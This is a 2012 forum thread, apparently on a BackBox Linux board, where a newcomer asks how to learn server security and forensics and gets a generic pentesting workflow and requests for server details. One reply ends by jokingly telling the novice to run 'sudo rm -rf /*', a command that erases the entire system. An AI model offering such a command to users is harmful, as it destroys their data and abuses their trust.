I am new here and had a very bad experience with BackTracks.....

Started by kidx, October 11, 2012, 12:27:58 PM

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Hello guys I am new here and looking for a full course on how to use the distro mainly to stop hackers attacking my dedicated server that i rent.I am not great with grammar but every time I post what I wanna accomplish people laugh,I have BackBox installed its easier than Back Tracks BT gave me a black screen upon starting the DE now this distro run's pro with no issues can you guys please guide me in the right direction to learn more about Digital Forensic and stopping hackers from attacking or preventing them thanks alot guys this distro rocks also this distro is one of the few that reboot properly great job. :D :D :D :D :D :D :D ;D ;D ;D :P :P :P :P  :D


Hi kidx,

Welcome and we will try help you. As i can see you want to learn about server security. I will say you how one pentester think, then you will know what to learn.

1. We learn all about our target : system os, system softwer, system logs, system settings files, system version etc ..
2. Then we try to get all informations with pentester tools nmap, nessus, pentbox, lynis, openvas and all OWASP security tools colection
3. When we get infromations, we try to find or we make exploits/payloads to run against system
4. If we find some issue, we try to find solutions, and then fix them etc ..

And it's done :). But all this you can't learn in few days. Read a lot, a lot great tutorials and books around for it. First all about your system, them learn how to attack.

Don't ask, read : http://wiki.backbox.org
or just run sudo rm -rf /*


thanks alot you have any books that i can read or recommendations and this community is very cool you guys understand me and you have a working OS yes thanks alot.


Quote from: kidx on October 11, 2012, 01:18:49 PM
thanks alot you have any books that i can read or recommendations and this community is very cool you guys understand me and you have a working OS yes thanks alot.
you can start to ask/post your queries here. if you want to be a pentester, like Zerof mentioned, you need to read a lot, not only book but digging around the internet and looking for your needs, only you know what you are looking for...

Therefore, if you need help for assessment of your server you have to provide some details, then we can help you out:
- what OS/distro installed on your server
- kernel version
- running applications (sshd, httpd, smtp, snmp, ftp, mysql, etc)...

PS> the people who attacks your server are not hackers, maybe just script kiddies...if they were hacker your server won't be alive at this time...so, my suggestion is, don't blame on hackesr, try to understand who are the hackers first instead, be curious.

Happy Hacking!